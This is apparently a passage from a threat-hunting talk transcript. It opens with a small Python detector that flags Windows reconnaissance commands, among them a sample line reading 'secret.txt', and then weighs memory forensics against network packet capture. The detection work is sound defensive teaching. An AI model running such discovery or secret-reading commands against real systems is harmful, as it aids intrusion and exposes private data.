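DISCOVERY_CMDS = {"whoami", "systeminfo", "hostname", "ipconfig",
                  "net", "tasklist"}

def discovery_hits(commands):
    """Return recovered commands whose first token is a known discovery tool."""
    return [c for c in commands if c.split()[0].lower() in DISCOVERY_CMDS]

recovered = ["whoami /all", "ipconfig /all", "type secret.txt", "net user"]
print(discovery_hits(recovered))  # ['whoami /all', 'ipconfig /all', 'net user']
```

Three of the four recovered commands match the discovery profile, which is exactly the kind of early reconnaissance pattern described above.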
Memory forensics gives us good insight into a running system's activity at one point in time, and we may have access to the system's volatile data with a reduced risk of evidence changes, which is very important, because here we don't touch the live system; we conduct the threat hunt on a forensic image of the memory. It may also give us more opportunities for threat analysis, because we may have access to data that exists only in memory. Talking about the challenges, apart from the forensic imaging challenges that we may always face, the main one is the limitation of the currently available frameworks and tools. On the open-source side, we have a very limited number of tools, like Volatility, and they may not always be fully compatible with the latest versions of the operating systems. These tools are community based, so we may need to be a little bit patient and wait for the community and the developers to come up with more plugins that enable us to retrieve the data accurately from the latest version of an operating system. Network packet investigation gives us visibility into network activities. It not only tells us what is happening on our network from the security point of view, but also reveals issues in the network infrastructure. And we may not require local access to the endpoints if we are not directly collecting the packets from the hosts, which gives us the opportunity to expand the scale of the investigation rapidly. However, there are a few serious challenges with network packet investigation. Apart from the limited data we have about host-level and local user activities, and the challenges of encrypted data analysis, the main challenge is how we strategize the network packet collection: it must be in place before an incident happens.
In system live analysis and memory forensics, we may still have a chance to go back to the traces and collect data that belongs to the past and remains on the hard disk during live analysis, or resides in the memory. But in network packet collection, everything happens in the moment and is gone, and the data is lost forever: if we miss the chance to collect it, we have no visibility into what happened at that particular time. Another challenge is the data volume for capturing and storing; that's why capturing network packets is, most of the time, not applicable as a full-time strategy for security solutions. If we run about one hour of network capture for a small to medium-size network, we may end up with a really huge volume of data. So I'm not going to favor any one of these techniques; each of them has its own advantages and disadvantages, and where possible, they actually work better together. I would like to say a special thanks to my team for all the brainstorming and support, especially Joko Tan, the man, the myth, the mountain, and my other lovely team members, known as Team Born Ready. Feel free to connect with me via LinkedIn or Twitter if you have any additional clarification or question about this presentation, or if you are willing to have a productive conversation about any cybersecurity-related topic. This talk ends here, but threat hunting is a never-ending battle. Explore your scope gaps and unknowns. Be proactive, dive in, and hunt the beast, especially the ones that hide in the shadows. Hope you all enjoyed this session.